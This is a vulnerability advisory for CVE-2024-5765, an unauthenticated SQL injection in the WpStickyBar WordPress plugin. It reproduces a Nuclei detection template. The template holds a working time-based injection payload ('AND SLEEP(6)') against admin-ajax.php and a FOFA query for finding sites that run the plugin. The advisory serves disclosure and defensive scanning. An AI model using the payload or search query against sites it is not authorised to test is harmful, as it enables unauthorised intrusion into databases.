CVE-2024-5765: WpStickyBar <= 2.1.0 - SQL Injection

日期: 2025-08-01 | 影响软件: WpStickyBar | POC: 已公开

漏洞描述

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection

PoC代码[已公开]

id: CVE-2024-5765

info:
  name: WpStickyBar <= 2.1.0 - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection
  reference:
    - https://wpscan.com/vulnerability/0b73f84c-611e-4681-b362-35e721478ba4/
    - https://wordpress.org/plugins/wpstickybar-sticky-bar-sticky-header/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5765
  classification:
    cve-id: CVE-2024-5765
    cwe-id: CWE-89
    epss-score: 0.78172
    epss-percentile: 0.98985
  metadata:
    max-request: 2
    verified: true
    fofa-query: body="/plugins/wpstickybar-sticky-bar-sticky-header"
  tags: time-based-sqli,cve,cve2024,sqli,wpscan,wordpress,wp-plugin,wp,wpstickybar,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/plugins/wpstickybar-sticky-bar-sticky-header")'
        internal: true

  - raw:
      - |
        @timeout: 15s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=stickybar_display&banner_id=1%20AND%20SLEEP(6);

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 4a0a004730450221009c60a9c0983a8a8db8971eeeef54b0b0c47e2142c62c5d366d6749f1bfecd98d02204d8ef3d48a561bde6dee969545483785270ec8fa923dfca934783fc1d22d56f9:922c64590222798bb761d5b6d8e72950